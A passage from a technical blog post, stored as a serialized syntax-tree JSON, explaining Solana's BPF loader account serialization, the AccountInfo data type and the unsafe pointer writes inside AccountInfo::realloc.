MAX_PERMITTED_DATA_INCREASE;\n",{"type":28,"tag":116,"props":14882,"children":14883},{"class":245,"line":665},[14884,14888,14892,14896,14900,14904,14908,14912,14916,14920,14924,14929,14934],{"type":28,"tag":116,"props":14885,"children":14886},{"style":272},[14887],{"type":33,"value":13567},{"type":28,"tag":116,"props":14889,"children":14890},{"style":370},[14891],{"type":33,"value":14728},{"type":28,"tag":116,"props":14893,"children":14894},{"style":266},[14895],{"type":33,"value":269},{"type":28,"tag":116,"props":14897,"children":14898},{"style":272},[14899],{"type":33,"value":13567},{"type":28,"tag":116,"props":14901,"children":14902},{"style":376},[14903],{"type":33,"value":8500},{"type":28,"tag":116,"props":14905,"children":14906},{"style":370},[14907],{"type":33,"value":9484},{"type":28,"tag":116,"props":14909,"children":14910},{"style":376},[14911],{"type":33,"value":9323},{"type":28,"tag":116,"props":14913,"children":14914},{"style":339},[14915],{"type":33,"value":14300},{"type":28,"tag":116,"props":14917,"children":14918},{"style":266},[14919],{"type":33,"value":1829},{"type":28,"tag":116,"props":14921,"children":14922},{"style":370},[14923],{"type":33,"value":141},{"type":28,"tag":116,"props":14925,"children":14926},{"style":282},[14927],{"type":33,"value":14928},"align_offset",{"type":28,"tag":116,"props":14930,"children":14931},{"style":266},[14932],{"type":33,"value":14933},"(BPF_ALIGN_OF_U128); ",{"type":28,"tag":116,"props":14935,"children":14936},{"style":250},[14937],{"type":33,"value":14938},"// padding\n",{"type":28,"tag":29,"props":14940,"children":14941},{},[14942,14944,14949,14951,14957,14959,14970,14972,14977,14979,14985,14987,14993,14995,15001],{"type":33,"value":14943},"In English, we have the length of the data, as a ",{"type":28,"tag":98,"props":14945,"children":14947},{"className":14946},[],[14948],{"type":33,"value":7714},{"type":33,"value":14950},", followed immediately by the data, and an additional ",{"type":28,"tag":98,"props":14952,"children":14954},{"className":14953},[],[14955],{"type":33,"value":14956},"MAX_PERMITTED_DATA_INCREASE",{"type":33,"value":14958}," of reserve space (+ padding) after that. Using the length and data pointer, we construct a Rust slice reference (",{"type":28,"tag":87,"props":14960,"children":14963},{"href":14961,"rel":14962},"https://doc.rust-lang.org/std/slice/fn.from_raw_parts_mut.html",[91],[14964],{"type":28,"tag":98,"props":14965,"children":14967},{"className":14966},[],[14968],{"type":33,"value":14969},"slice::from_raw_parts_mut",{"type":33,"value":14971},") - slices are how Rust represents a, well, ",{"type":28,"tag":2583,"props":14973,"children":14974},{},[14975],{"type":33,"value":14976},"slice",{"type":33,"value":14978}," (contiguous chunk) of memory - then wrap it up inside a ",{"type":28,"tag":98,"props":14980,"children":14982},{"className":14981},[],[14983],{"type":33,"value":14984},"Rc\u003CRefCell\u003CT>>",{"type":33,"value":14986},", giving us the unwieldy-looking type of ",{"type":28,"tag":98,"props":14988,"children":14990},{"className":14989},[],[14991],{"type":33,"value":14992},"AccountInfo.data",{"type":33,"value":14994},": ",{"type":28,"tag":98,"props":14996,"children":14998},{"className":14997},[],[14999],{"type":33,"value":15000},"Rc\u003CRefCell\u003C&mut [u8]>>",{"type":33,"value":141},{"type":28,"tag":29,"props":15003,"children":15004},{},[15005,15007,15014],{"type":33,"value":15006},"Now, what's the point of this complicated type? That's because when the same account is passed in multiple times to a program, instead of duplicating the data for the account, the BPF loader simply refers back to the first instance of the account. On the Rust side, that corresponds to ",{"type":28,"tag":87,"props":15008,"children":15011},{"href":15009,"rel":15010},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#335-336",[91],[15012],{"type":33,"value":15013},"cloning the referenced account",{"type":33,"value":4160},{"type":28,"tag":234,"props":15016,"children":15018},{"className":2652,"code":15017,"language":2651,"meta":7,"style":7},"// Duplicate account, clone the original\naccounts.push(accounts[dup_info as usize].clone());\n",[15019],{"type":28,"tag":98,"props":15020,"children":15021},{"__ignoreMap":7},[15022,15030],{"type":28,"tag":116,"props":15023,"children":15024},{"class":245,"line":246},[15025],{"type":28,"tag":116,"props":15026,"children":15027},{"style":250},[15028],{"type":33,"value":15029},"// Duplicate account, clone the original\n",{"type":28,"tag":116,"props":15031,"children":15032},{"class":245,"line":256},[15033,15037,15041,15045,15049,15053,15057,15062,15066,15070,15075,15079,15084],{"type":28,"tag":116,"props":15034,"children":15035},{"style":272},[15036],{"type":33,"value":14341},{"type":28,"tag":116,"props":15038,"children":15039},{"style":370},[15040],{"type":33,"value":141},{"type":28,"tag":116,"props":15042,"children":15043},{"style":282},[15044],{"type":33,"value":3482},{"type":28,"tag":116,"props":15046,"children":15047},{"style":266},[15048],{"type":33,"value":313},{"type":28,"tag":116,"props":15050,"children":15051},{"style":272},[15052],{"type":33,"value":14341},{"type":28,"tag":116,"props":15054,"children":15055},{"style":266},[15056],{"type":33,"value":347},{"type":28,"tag":116,"props":15058,"children":15059},{"style":272},[15060],{"type":33,"value":15061},"dup_info",{"type":28,"tag":116,"props":15063,"children":15064},{"style":376},[15065],{"type":33,"value":8500},{"type":28,"tag":116,"props":15067,"children":15068},{"style":339},[15069],{"type":33,"value":13397},{"type":28,"tag":116,"props":15071,"children":15072},{"style":266},[15073],{"type":33,"value":15074},"]",{"type":28,"tag":116,"props":15076,"children":15077},{"style":370},[15078],{"type":33,"value":141},{"type":28,"tag":116,"props":15080,"children":15081},{"style":282},[15082],{"type":33,"value":15083},"clone",{"type":28,"tag":116,"props":15085,"children":15086},{"style":266},[15087],{"type":33,"value":1577},{"type":28,"tag":29,"props":15089,"children":15090},{},[15091,15093,15098,15100,15105,15107,15112,15114,15119,15120,15126,15128,15133,15135,15147,15149,15154],{"type":33,"value":15092},"Since ",{"type":28,"tag":98,"props":15094,"children":15096},{"className":15095},[],[15097],{"type":33,"value":3372},{"type":33,"value":15099}," inside the ",{"type":28,"tag":98,"props":15101,"children":15103},{"className":15102},[],[15104],{"type":33,"value":14602},{"type":33,"value":15106}," is a ",{"type":28,"tag":98,"props":15108,"children":15110},{"className":15109},[],[15111],{"type":33,"value":14984},{"type":33,"value":15113},", where the ",{"type":28,"tag":98,"props":15115,"children":15117},{"className":15116},[],[15118],{"type":33,"value":5659},{"type":33,"value":15106},{"type":28,"tag":98,"props":15121,"children":15123},{"className":15122},[],[15124],{"type":33,"value":15125},"&mut [u8]",{"type":33,"value":15127}," pointing at the actual data buffer, when we clone the ",{"type":28,"tag":98,"props":15129,"children":15131},{"className":15130},[],[15132],{"type":33,"value":14602},{"type":33,"value":15134},", we get a new reference",{"type":28,"tag":15136,"props":15137,"children":15138},"sup",{},[15139],{"type":28,"tag":87,"props":15140,"children":15145},{"href":15141,"ariaDescribedBy":15142,"dataFootnoteRef":7,"id":15144},"#user-content-fn-rc-refs",[15143],"footnote-label","user-content-fnref-rc-refs",[15146],{"type":33,"value":1824},{"type":33,"value":15148}," to the slice pointing at the ",{"type":28,"tag":2583,"props":15150,"children":15151},{},[15152],{"type":33,"value":15153},"same",{"type":33,"value":15155}," data buffer.",{"type":28,"tag":29,"props":15157,"children":15158},{},[15159,15161,15167,15169,15175],{"type":33,"value":15160},"And of course to uphold borrowing rules while having a shared pointer, we have interior mutability via ",{"type":28,"tag":98,"props":15162,"children":15164},{"className":15163},[],[15165],{"type":33,"value":15166},"RefCell",{"type":33,"value":15168}," to check the rules at runtime. (The ",{"type":28,"tag":98,"props":15170,"children":15172},{"className":15171},[],[15173],{"type":33,"value":15174},"lamports",{"type":33,"value":15176}," field is very similar, for essentially the same reason - we need to be able to mutate it, but it is also shared between multiple instances of the same account.)",{"type":28,"tag":29,"props":15178,"children":15179},{},[15180,15182,15188],{"type":33,"value":15181},"Changing the data of an account is done by simply writing to ",{"type":28,"tag":98,"props":15183,"children":15185},{"className":15184},[],[15186],{"type":33,"value":15187},"AccountInfo::data",{"type":33,"value":15189},", which, as we just saw, is basically a pointer into the serialized buffer from the runtime; after the program exits, the loader reads the buffer back in to look at what the new state of the accounts should be.",{"type":28,"tag":29,"props":15191,"children":15192},{},[15193,15195,15202],{"type":33,"value":15194},"This is also where the ",{"type":28,"tag":87,"props":15196,"children":15199},{"href":15197,"rel":15198},"https://github.com/solana-labs/solana/blob/9fb0e76dc276f88b79720112477383a120c61b8f/program-runtime/src/pre_account.rs",[91],[15200],{"type":33,"value":15201},"runtime validity checks",{"type":33,"value":15203}," are imposed.",{"type":28,"tag":234,"props":15205,"children":15207},{"className":2652,"code":15206,"language":2651,"meta":7,"style":7},"// Only the owner may change account data\n//   and if the account is writable\n//   and if the account is not executable\nif !(program_id == pre.owner()\n    && is_writable  // line coverage used to get branch coverage\n    && !pre.executable())\n    && pre.data() != post.data()\n{\n    if pre.executable() {\n        return Err(InstructionError::ExecutableDataModified);\n    } else if is_writable {\n        return Err(InstructionError::ExternalAccountDataModified);\n    } else {\n        return Err(InstructionError::ReadonlyDataModified);\n    }\n}\n",[15208],{"type":28,"tag":98,"props":15209,"children":15210},{"__ignoreMap":7},[15211,15219,15227,15235,15276,15294,15323,15368,15375,15398,15433,15458,15490,15505,15537,15544],{"type":28,"tag":116,"props":15212,"children":15213},{"class":245,"line":246},[15214],{"type":28,"tag":116,"props":15215,"children":15216},{"style":250},[15217],{"type":33,"value":15218},"// Only the owner may change account data\n",{"type":28,"tag":116,"props":15220,"children":15221},{"class":245,"line":256},[15222],{"type":28,"tag":116,"props":15223,"children":15224},{"style":250},[15225],{"type":33,"value":15226},"//   and if the account is writable\n",{"type":28,"tag":116,"props":15228,"children":15229},{"class":245,"line":293},[15230],{"type":28,"tag":116,"props":15231,"children":15232},{"style":250},[15233],{"type":33,"value":15234},"//   and if the account is not executable\n",{"type":28,"tag":116,"props":15236,"children":15237},{"class":245,"line":361},[15238,15242,15246,15250,15254,15258,15263,15267,15272],{"type":28,"tag":116,"props":15239,"children":15240},{"style":260},[15241],{"type":33,"value":263},{"type":28,"tag":116,"props":15243,"children":15244},{"style":370},[15245],{"type":33,"value":12530},{"type":28,"tag":116,"props":15247,"children":15248},{"style":266},[15249],{"type":33,"value":313},{"type":28,"tag":116,"props":15251,"children":15252},{"style":272},[15253],{"type":33,"value":14332},{"type":28,"tag":116,"props":15255,"children":15256},{"style":370},[15257],{"type":33,"value":2953},{"type":28,"tag":116,"props":15259,"children":15260},{"style":272},[15261],{"type":33,"value":15262}," pre",{"type":28,"tag":116,"props":15264,"children":15265},{"style":370},[15266],{"type":33,"value":141},{"type":28,"tag":116,"props":15268,"children":15269},{"style":282},[15270],{"type":33,"value":15271},"owner",{"type":28,"tag":116,"props":15273,"children":15274},{"style":266},[15275],{"type":33,"value":7407},{"type":28,"tag":116,"props":15277,"children":15278},{"class":245,"line":387},[15279,15284,15289],{"type":28,"tag":116,"props":15280,"children":15281},{"style":370},[15282],{"type":33,"value":15283},"    &&",{"type":28,"tag":116,"props":15285,"children":15286},{"style":272},[15287],{"type":33,"value":15288}," is_writable",{"type":28,"tag":116,"props":15290,"children":15291},{"style":250},[15292],{"type":33,"value":15293},"  // line coverage used to get branch coverage\n",{"type":28,"tag":116,"props":15295,"children":15296},{"class":245,"line":400},[15297,15301,15305,15309,15313,15318],{"type":28,"tag":116,"props":15298,"children":15299},{"style":370},[15300],{"type":33,"value":15283},{"type":28,"tag":116,"props":15302,"children":15303},{"style":370},[15304],{"type":33,"value":12530},{"type":28,"tag":116,"props":15306,"children":15307},{"style":272},[15308],{"type":33,"value":234},{"type":28,"tag":116,"props":15310,"children":15311},{"style":370},[15312],{"type":33,"value":141},{"type":28,"tag":116,"props":15314,"children":15315},{"style":282},[15316],{"type":33,"value":15317},"executable",{"type":28,"tag":116,"props":15319,"children":15320},{"style":266},[15321],{"type":33,"value":15322},"())\n",{"type":28,"tag":116,"props":15324,"children":15325},{"class":245,"line":614},[15326,15330,15334,15338,15342,15346,15351,15356,15360,15364],{"type":28,"tag":116,"props":15327,"children":15328},{"style":370},[15329],{"type":33,"value":15283},{"type":28,"tag":116,"props":15331,"children":15332},{"style":272},[15333],{"type":33,"value":15262},{"type":28,"tag":116,"props":15335,"children":15336},{"style":370},[15337],{"type":33,"value":141},{"type":28,"tag":116,"props":15339,"children":15340},{"style":282},[15341],{"type":33,"value":3372},{"type":28,"tag":116,"props":15343,"children":15344},{"style":266},[15345],{"type":33,"value":13709},{"type":28,"tag":116,"props":15347,"children":15348},{"style":370},[15349],{"type":33,"value":15350},"!=",{"type":28,"tag":116,"props":15352,"children":15353},{"style":272},[15354],{"type":33,"value":15355}," post",{"type":28,"tag":116,"props":15357,"children":15358},{"style":370},[15359],{"type":33,"value":141},{"type":28,"tag":116,"props":15361,"children":15362},{"style":282},[15363],{"type":33,"value":3372},{"type":28,"tag":116,"props":15365,"children":15366},{"style":266},[15367],{"type":33,"value":7407},{"type":28,"tag":116,"props":15369,"children":15370},{"class":245,"line":631},[15371],{"type":28,"tag":116,"props":15372,"children":15373},{"style":266},[15374],{"type":33,"value":10547},{"type":28,"tag":116,"props":15376,"children":15377},{"class":245,"line":665},[15378,15382,15386,15390,15394],{"type":28,"tag":116,"props":15379,"children":15380},{"style":260},[15381],{"type":33,"value":11947},{"type":28,"tag":116,"props":15383,"children":15384},{"style":272},[15385],{"type":33,"value":15262},{"type":28,"tag":116,"props":15387,"children":15388},{"style":370},[15389],{"type":33,"value":141},{"type":28,"tag":116,"props":15391,"children":15392},{"style":282},[15393],{"type":33,"value":15317},{"type":28,"tag":116,"props":15395,"children":15396},{"style":266},[15397],{"type":33,"value":1068},{"type":28,"tag":116,"props":15399,"children":15400},{"class":245,"line":713},[15401,15406,15411,15415,15420,15424,15429],{"type":28,"tag":116,"props":15402,"children":15403},{"style":260},[15404],{"type":33,"value":15405},"        return",{"type":28,"tag":116,"props":15407,"children":15408},{"style":339},[15409],{"type":33,"value":15410}," Err",{"type":28,"tag":116,"props":15412,"children":15413},{"style":266},[15414],{"type":33,"value":313},{"type":28,"tag":116,"props":15416,"children":15417},{"style":339},[15418],{"type":33,"value":15419},"InstructionError",{"type":28,"tag":116,"props":15421,"children":15422},{"style":370},[15423],{"type":33,"value":3151},{"type":28,"tag":116,"props":15425,"children":15426},{"style":339},[15427],{"type":33,"value":15428},"ExecutableDataModified",{"type":28,"tag":116,"props":15430,"children":15431},{"style":266},[15432],{"type":33,"value":895},{"type":28,"tag":116,"props":15434,"children":15435},{"class":245,"line":750},[15436,15441,15445,15450,15454],{"type":28,"tag":116,"props":15437,"children":15438},{"style":266},[15439],{"type":33,"value":15440},"    } ",{"type":28,"tag":116,"props":15442,"children":15443},{"style":260},[15444],{"type":33,"value":2986},{"type":28,"tag":116,"props":15446,"children":15447},{"style":260},[15448],{"type":33,"value":15449}," if",{"type":28,"tag":116,"props":15451,"children":15452},{"style":272},[15453],{"type":33,"value":15288},{"type":28,"tag":116,"props":15455,"children":15456},{"style":266},[15457],{"type":33,"value":1291},{"type":28,"tag":116,"props":15459,"children":15460},{"class":245,"line":779},[15461,15465,15469,15473,15477,15481,15486],{"type":28,"tag":116,"props":15462,"children":15463},{"style":260},[15464],{"type":33,"value":15405},{"type":28,"tag":116,"props":15466,"children":15467},{"style":339},[15468],{"type":33,"value":15410},{"type":28,"tag":116,"props":15470,"children":15471},{"style":266},[15472],{"type":33,"value":313},{"type":28,"tag":116,"props":15474,"children":15475},{"style":339},[15476],{"type":33,"value":15419},{"type":28,"tag":116,"props":15478,"children":15479},{"style":370},[15480],{"type":33,"value":3151},{"type":28,"tag":116,"props":15482,"children":15483},{"style":339},[15484],{"type":33,"value":15485},"ExternalAccountDataModified",{"type":28,"tag":116,"props":15487,"children":15488},{"style":266},[15489],{"type":33,"value":895},{"type":28,"tag":116,"props":15491,"children":15492},{"class":245,"line":796},[15493,15497,15501],{"type":28,"tag":116,"props":15494,"children":15495},{"style":266},[15496],{"type":33,"value":15440},{"type":28,"tag":116,"props":15498,"children":15499},{"style":260},[15500],{"type":33,"value":2986},{"type":28,"tag":116,"props":15502,"children":15503},{"style":266},[15504],{"type":33,"value":1291},{"type":28,"tag":116,"props":15506,"children":15507},{"class":245,"line":847},[15508,15512,15516,15520,15524,15528,15533],{"type":28,"tag":116,"props":15509,"children":15510},{"style":260},[15511],{"type":33,"value":15405},{"type":28,"tag":116,"props":15513,"children":15514},{"style":339},[15515],{"type":33,"value":15410},{"type":28,"tag":116,"props":15517,"children":15518},{"style":266},[15519],{"type":33,"value":313},{"type":28,"tag":116,"props":15521,"children":15522},{"style":339},[15523],{"type":33,"value":15419},{"type":28,"tag":116,"props":15525,"children":15526},{"style":370},[15527],{"type":33,"value":3151},{"type":28,"tag":116,"props":15529,"children":15530},{"style":339},[15531],{"type":33,"value":15532},"ReadonlyDataModified",{"type":28,"tag":116,"props":15534,"children":15535},{"style":266},[15536],{"type":33,"value":895},{"type":28,"tag":116,"props":15538,"children":15539},{"class":245,"line":898},[15540],{"type":28,"tag":116,"props":15541,"children":15542},{"style":266},[15543],{"type":33,"value":3025},{"type":28,"tag":116,"props":15545,"children":15546},{"class":245,"line":907},[15547],{"type":28,"tag":116,"props":15548,"children":15549},{"style":266},[15550],{"type":33,"value":406},{"type":28,"tag":75,"props":15552,"children":15554},{"id":15553},"back-to-realloc",[15555,15557],{"type":33,"value":15556},"Back to ",{"type":28,"tag":98,"props":15558,"children":15560},{"className":15559},[],[15561],{"type":33,"value":13304},{"type":28,"tag":29,"props":15563,"children":15564},{},[15565],{"type":33,"value":15566},"As a reminder, this is what we were looking at before that detour:",{"type":28,"tag":234,"props":15568,"children":15569},{"className":2652,"code":14057,"language":2651,"meta":7,"style":7},[15570],{"type":28,"tag":98,"props":15571,"children":15572},{"__ignoreMap":7},[15573,15580,15667],{"type":28,"tag":116,"props":15574,"children":15575},{"class":245,"line":246},[15576],{"type":28,"tag":116,"props":15577,"children":15578},{"style":250},[15579],{"type":33,"value":14069},{"type":28,"tag":116,"props":15581,"children":15582},{"class":245,"line":256},[15583,15587,15591,15595,15599,15603,15607,15611,15615,15619,15623,15627,15631,15635,15639,15643,15647,15651,15655,15659,15663],{"type":28,"tag":116,"props":15584,"children":15585},{"style":376},[15586],{"type":33,"value":11455},{"type":28,"tag":116,"props":15588,"children":15589},{"style":272},[15590],{"type":33,"value":13523},{"type":28,"tag":116,"props":15592,"children":15593},{"style":370},[15594],{"type":33,"value":2226},{"type":28,"tag":116,"props":15596,"children":15597},{"style":376},[15598],{"type":33,"value":13463},{"type":28,"tag":116,"props":15600,"children":15601},{"style":370},[15602],{"type":33,"value":141},{"type":28,"tag":116,"props":15604,"children":15605},{"style":282},[15606],{"type":33,"value":13540},{"type":28,"tag":116,"props":15608,"children":15609},{"style":266},[15610],{"type":33,"value":13545},{"type":28,"tag":116,"props":15612,"children":15613},{"style":370},[15614],{"type":33,"value":2803},{"type":28,"tag":116,"props":15616,"children":15617},{"style":282},[15618],{"type":33,"value":13554},{"type":28,"tag":116,"props":15620,"children":15621},{"style":266},[15622],{"type":33,"value":13545},{"type":28,"tag":116,"props":15624,"children":15625},{"style":370},[15626],{"type":33,"value":141},{"type":28,"tag":116,"props":15628,"children":15629},{"style":282},[15630],{"type":33,"value":13567},{"type":28,"tag":116,"props":15632,"children":15633},{"style":266},[15634],{"type":33,"value":313},{"type":28,"tag":116,"props":15636,"children":15637},{"style":370},[15638],{"type":33,"value":3996},{"type":28,"tag":116,"props":15640,"children":15641},{"style":350},[15642],{"type":33,"value":3745},{"type":28,"tag":116,"props":15644,"children":15645},{"style":266},[15646],{"type":33,"value":1609},{"type":28,"tag":116,"props":15648,"children":15649},{"style":376},[15650],{"type":33,"value":8513},{"type":28,"tag":116,"props":15652,"children":15653},{"style":370},[15654],{"type":33,"value":9484},{"type":28,"tag":116,"props":15656,"children":15657},{"style":376},[15658],{"type":33,"value":3394},{"type":28,"tag":116,"props":15660,"children":15661},{"style":339},[15662],{"type":33,"value":5531},{"type":28,"tag":116,"props":15664,"children":15665},{"style":266},[15666],{"type":33,"value":384},{"type":28,"tag":116,"props":15668,"children":15669},{"class":245,"line":293},[15670,15674,15678,15682,15686,15690,15694],{"type":28,"tag":116,"props":15671,"children":15672},{"style":370},[15673],{"type":33,"value":4240},{"type":28,"tag":116,"props":15675,"children":15676},{"style":272},[15677],{"type":33,"value":13615},{"type":28,"tag":116,"props":15679,"children":15680},{"style":370},[15681],{"type":33,"value":2226},{"type":28,"tag":116,"props":15683,"children":15684},{"style":272},[15685],{"type":33,"value":13624},{"type":28,"tag":116,"props":15687,"children":15688},{"style":376},[15689],{"type":33,"value":8500},{"type":28,"tag":116,"props":15691,"children":15692},{"style":339},[15693],{"type":33,"value":5531},{"type":28,"tag":116,"props":15695,"children":15696},{"style":266},[15697],{"type":33,"value":384},{"type":28,"tag":29,"props":15699,"children":15700},{},[15701,15706,15708,15713,15715,15720,15722,15733,15735,15740,15742,15747],{"type":28,"tag":98,"props":15702,"children":15704},{"className":15703},[],[15705],{"type":33,"value":13540},{"type":33,"value":15707}," gives us the ",{"type":28,"tag":98,"props":15709,"children":15711},{"className":15710},[],[15712],{"type":33,"value":15125},{"type":33,"value":15714}," from the ",{"type":28,"tag":98,"props":15716,"children":15718},{"className":15717},[],[15719],{"type":33,"value":15000},{"type":33,"value":15721},", whose data is inside the serialized buffer and immediately after the size of the data inside the serialized buffer. And ",{"type":28,"tag":87,"props":15723,"children":15726},{"href":15724,"rel":15725},"https://doc.rust-lang.org/std/primitive.slice.html#method.as_mut_ptr",[91],[15727],{"type":28,"tag":98,"props":15728,"children":15730},{"className":15729},[],[15731],{"type":33,"value":15732},"slice::as_mut_ptr()",{"type":33,"value":15734}," gives us that data pointer directly. So, this code computes a pointer to that serialized size field (8 bytes - the size of a ",{"type":28,"tag":98,"props":15736,"children":15738},{"className":15737},[],[15739],{"type":33,"value":7714},{"type":33,"value":15741}," - behind the data buffer), and then writes ",{"type":28,"tag":98,"props":15743,"children":15745},{"className":15744},[],[15746],{"type":33,"value":13388},{"type":33,"value":15748}," to it.",{"type":28,"tag":29,"props":15750,"children":15751},{},[15752,15754,15766,15768,15774],{"type":33,"value":15753},"This is reasonable... ",{"type":28,"tag":2583,"props":15755,"children":15756},{},[15757,15759,15764],{"type":33,"value":15758},"as long as the ",{"type":28,"tag":98,"props":15760,"children":15762},{"className":15761},[],[15763],{"type":33,"value":3372},{"type":33,"value":15765}," actually came from the serialized buffer",{"type":33,"value":15767},". We'll come back to this ",{"type":28,"tag":87,"props":15769,"children":15771},{"href":15770},"#Not-contracts",[15772],{"type":33,"value":15773},"later",{"type":33,"value":141},{"type":28,"tag":29,"props":15776,"children":15777},{},[15778,15780,15785],{"type":33,"value":15779},"At this point we've updated the serialized buffer, so at exit the runtime will understand that the size of the account's data buffer has changed. However, we haven't dealt with the Rust side yet. Slices have a length, and we haven't dealt with the ",{"type":28,"tag":98,"props":15781,"children":15783},{"className":15782},[],[15784],{"type":33,"value":15125},{"type":33,"value":15786}," slice that is our view into the data from the Rust world. So let's look at the next chunk:",{"type":28,"tag":234,"props":15788,"children":15790},{"className":2652,"code":15789,"language":2651,"meta":7,"style":7},"// Then set the new length in the local slice\nlet ptr = &mut *(((self.data.as_ptr() as *const u64).offset(1) as u64) as *mut u64);\n*ptr = new_len as u64;\n",[15791],{"type":28,"tag":98,"props":15792,"children":15793},{"__ignoreMap":7},[15794,15802,15929],{"type":28,"tag":116,"props":15795,"children":15796},{"class":245,"line":246},[15797],{"type":28,"tag":116,"props":15798,"children":15799},{"style":250},[15800],{"type":33,"value":15801},"// Then set the new length in the local slice\n",{"type":28,"tag":116,"props":15803,"children":15804},{"class":245,"line":256},[15805,15809,15813,15817,15821,15825,15829,15833,15837,15841,15845,15849,15853,15857,15861,15865,15869,15873,15877,15881,15885,15889,15893,15897,15901,15905,15909,15913,15917,15921,15925],{"type":28,"tag":116,"props":15806,"children":15807},{"style":376},[15808],{"type":33,"value":11455},{"type":28,"tag":116,"props":15810,"children":15811},{"style":272},[15812],{"type":33,"value":13523},{"type":28,"tag":116,"props":15814,"children":15815},{"style":370},[15816],{"type":33,"value":2226},{"type":28,"tag":116,"props":15818,"children":15819},{"style":370},[15820],{"type":33,"value":6813},{"type":28,"tag":116,"props":15822,"children":15823},{"style":376},[15824],{"type":33,"value":3394},{"type":28,"tag":116,"props":15826,"children":15827},{"style":370},[15828],{"type":33,"value":9484},{"type":28,"tag":116,"props":15830,"children":15831},{"style":266},[15832],{"type":33,"value":13683},{"type":28,"tag":116,"props":15834,"children":15835},{"style":376},[15836],{"type":33,"value":13379},{"type":28,"tag":116,"props":15838,"children":15839},{"style":370},[15840],{"type":33,"value":141},{"type":28,"tag":116,"props":15842,"children":15843},{"style":266},[15844],{"type":33,"value":3372},{"type":28,"tag":116,"props":15846,"children":15847},{"style":370},[15848],{"type":33,"value":141},{"type":28,"tag":116,"props":15850,"children":15851},{"style":282},[15852],{"type":33,"value":13704},{"type":28,"tag":116,"props":15854,"children":15855},{"style":266},[15856],{"type":33,"value":13709},{"type":28,"tag":116,"props":15858,"children":15859},{"style":376},[15860],{"type":33,"value":8513},{"type":28,"tag":116,"props":15862,"children":15863},{"style":370},[15864],{"type":33,"value":9484},{"type":28,"tag":116,"props":15866,"children":15867},{"style":376},[15868],{"type":33,"value":9323},{"type":28,"tag":116,"props":15870,"children":15871},{"style":339},[15872],{"type":33,"value":5531},{"type":28,"tag":116,"props":15874,"children":15875},{"style":266},[15876],{"type":33,"value":1829},{"type":28,"tag":116,"props":15878,"children":15879},{"style":370},[15880],{"type":33,"value":141},{"type":28,"tag":116,"props":15882,"children":15883},{"style":282},[15884],{"type":33,"value":13567},{"type":28,"tag":116,"props":15886,"children":15887},{"style":266},[15888],{"type":33,"value":313},{"type":28,"tag":116,"props":15890,"children":15891},{"style":350},[15892],{"type":33,"value":1824},{"type":28,"tag":116,"props":15894,"children":15895},{"style":266},[15896],{"type":33,"value":1609},{"type":28,"tag":116,"props":15898,"children":15899},{"style":376},[15900],{"type":33,"value":8513},{"type":28,"tag":116,"props":15902,"children":15903},{"style":339},[15904],{"type":33,"value":5531},{"type":28,"tag":116,"props":15906,"children":15907},{"style":266},[15908],{"type":33,"value":1609},{"type":28,"tag":116,"props":15910,"children":15911},{"style":376},[15912],{"type":33,"value":8513},{"type":28,"tag":116,"props":15914,"children":15915},{"style":370},[15916],{"type":33,"value":9484},{"type":28,"tag":116,"props":15918,"children":15919},{"style":376},[15920],{"type":33,"value":3394},{"type":28,"tag":116,"props":15922,"children":15923},{"style":339},[15924],{"type":33,"value":5531},{"type":28,"tag":116,"props":15926,"children":15927},{"style":266},[15928],{"type":33,"value":895},{"type":28,"tag":116,"props":15930,"children":15931},{"class":245,"line":293},[15932,15936,15940,15944,15948,15952,15956],{"type":28,"tag":116,"props":15933,"children":15934},{"style":370},[15935],{"type":33,"value":4240},{"type":28,"tag":116,"props":15937,"children":15938},{"style":272},[15939],{"type":33,"value":13615},{"type":28,"tag":116,"props":15941,"children":15942},{"style":370},[15943],{"type":33,"value":2226},{"type":28,"tag":116,"props":15945,"children":15946},{"style":272},[15947],{"type":33,"value":13624},{"type":28,"tag":116,"props":15949,"children":15950},{"style":376},[15951],{"type":33,"value":8500},{"type":28,"tag":116,"props":15953,"children":15954},{"style":339},[15955],{"type":33,"value":5531},{"type":28,"tag":116,"props":15957,"children":15958},{"style":266},[15959],{"type":33,"value":384},{"type":28,"tag":29,"props":15961,"children":15962},{},[15963,15965,15971,15973,15984,15986,15992,15994,16000,16002,16007,16009,16014,16016,16026,16027,16034,16035,16042,16049,16051,16057,16059,16065,16067,16072,16074,16079,16081,16087,16089,16094],{"type":33,"value":15964},"That ",{"type":28,"tag":98,"props":15966,"children":15968},{"className":15967},[],[15969],{"type":33,"value":15970},"as_ptr()",{"type":33,"value":15972}," call is ",{"type":28,"tag":87,"props":15974,"children":15977},{"href":15975,"rel":15976},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.as_ptr",[91],[15978],{"type":28,"tag":98,"props":15979,"children":15981},{"className":15980},[],[15982],{"type":33,"value":15983},"RefCell::as_ptr()",{"type":33,"value":15985}," due to the ",{"type":28,"tag":98,"props":15987,"children":15989},{"className":15988},[],[15990],{"type":33,"value":15991},"Deref",{"type":33,"value":15993}," impl on ",{"type":28,"tag":98,"props":15995,"children":15997},{"className":15996},[],[15998],{"type":33,"value":15999},"Rc",{"type":33,"value":16001}," (remember also that ",{"type":28,"tag":98,"props":16003,"children":16005},{"className":16004},[],[16006],{"type":33,"value":15166},{"type":33,"value":16008}," itself doesn't behave like a reference, you need to actually ",{"type":28,"tag":2583,"props":16010,"children":16011},{},[16012],{"type":33,"value":16013},"get",{"type":33,"value":16015}," one through ",{"type":28,"tag":87,"props":16017,"children":16020},{"href":16018,"rel":16019},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow",[91],[16021],{"type":28,"tag":98,"props":16022,"children":16024},{"className":16023},[],[16025],{"type":33,"value":8474},{"type":33,"value":6129},{"type":28,"tag":87,"props":16028,"children":16031},{"href":16029,"rel":16030},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.borrow_mut",[91],[16032],{"type":33,"value":16033},"and",{"type":33,"value":6129},{"type":28,"tag":87,"props":16036,"children":16039},{"href":16037,"rel":16038},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow",[91],[16040],{"type":33,"value":16041},"frie",{"type":28,"tag":87,"props":16043,"children":16046},{"href":16044,"rel":16045},"https://doc.rust-lang.org/std/cell/struct.RefCell.html#method.try_borrow_mut",[91],[16047],{"type":33,"value":16048},"nds",{"type":33,"value":16050},"). So from ",{"type":28,"tag":98,"props":16052,"children":16054},{"className":16053},[],[16055],{"type":33,"value":16056},"RefCell::\u003C&mut [u8]>::as_mut()",{"type":33,"value":16058}," we get a ",{"type":28,"tag":98,"props":16060,"children":16062},{"className":16061},[],[16063],{"type":33,"value":16064},"*mut &mut 